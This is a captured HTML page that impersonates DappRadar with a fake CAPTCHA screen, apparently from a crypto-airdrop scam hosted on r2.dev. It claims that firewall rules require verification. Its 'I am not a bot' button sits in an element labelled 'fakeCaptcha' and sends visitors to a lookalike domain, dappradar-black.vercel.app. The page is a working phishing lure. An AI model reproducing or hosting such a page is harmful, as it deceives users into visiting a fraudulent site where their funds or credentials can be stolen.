<!DOCTYPE html><html lang="en" data-scrapbook-source="https://pub-e4561cd28b344a62a14208900d8c4088.r2.dev/airdrops/captcha.html"><head>
    
    <title>Captcha | DappRadar</title>
    <link href="favicon-32x32.png" rel="icon" sizes="32x32" type="image/png">
    <link href="favicon-16x16.png" rel="icon" sizes="16x16" type="image/png">
    <!-- Required meta tags -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="googlebot" content="noindex,indexifembedded">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="bootstrap.min.css">


    <style>.main-button {
            transition-duration: .2s;
            color: white;
            width: fit-content;
            text-decoration: none;
            border: 0;
            cursor: pointer;
            background-color: #006cff;
            padding: 10px;
            border-radius: 10px;
        }

        .main-button:hover {
            color: white;
            text-decoration: none;
            background-color: #0056cc;
        }

        body {
            height: 100vh;
            /* Set the body to full height of the viewport */
            display: flex;
            align-items: center;
            /* Center content vertically */
            background-color: #161616;
        }

        .container {
            width: 100%;
        }

        @media only screen and (max-width: 600px) {
            body {
                text-align: center;
                align-items: start;
            }

            .container {
                margin-top: 120px;
            }
        }
    </style>
</head>

<body>


    <div class="container">
        <div class="row justify-content-md-center">

            <div class="col-md-auto">

                <img class="mb-4" src="logo2.png" width="150">
                <h1 class="mb-3" style="font-size: 1.21rem; color: white;">Please complete the following CAPTCHA security challenge to continue!</h1>
                <div class="mb-4" id="fakeCaptcha">
                    <form method="GET" action="https://dappradar-black.vercel.app/" id="verifyForm">
    <button type="submit" class="main-button">I am not a bot</button>
</form>
                </div>
                <p style="font-size: 14px; color: white; font-weight: bold; margin-bottom: 2px;" class="highlight">Why do I see CAPTCHA challenages?</p>
                <p style="font-size: 12px; color: white;" class="std-text mb-3">Due to current firewall security rules, you need to complete the CAPTCHA security challenge to continue access!</p>
                <hr style="  border: 1px solid white;">

                <p style="font-size: 12px; color: white;" class="std-text mb-3">Event ID: 2da61e70f93b415 • <a target="_blank" rel="noopener noreferrer" href="https://twitter.com/">Twitter</a> <a target="_blank" rel="noopener noreferrer" href="https://instagram.com/">Instagram</a> <a target="_blank" rel="noopener noreferrer" href="https://youtube.com/">Youtube</a></p><p></p> 

            </div>
        </div>
    </div>



    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    
    
    

<!-- Default Statcounter code for Twitter Feed
https://pub-d4ba4a97c68243fc91c7ac927ea15880.r2.dev/x/feed/index.html
-->


<noscript><div class="statcounter"><a title="Web Analytics
Made Easy - Statcounter" href="https://statcounter.com/" target="_blank"><img class="statcounter" src="_.gif" alt="Web Analytics Made Easy - Statcounter" referrerpolicy="no-referrer-when-downgrade"></a></div></noscript>
<!-- End of Statcounter Code -->


</body></html>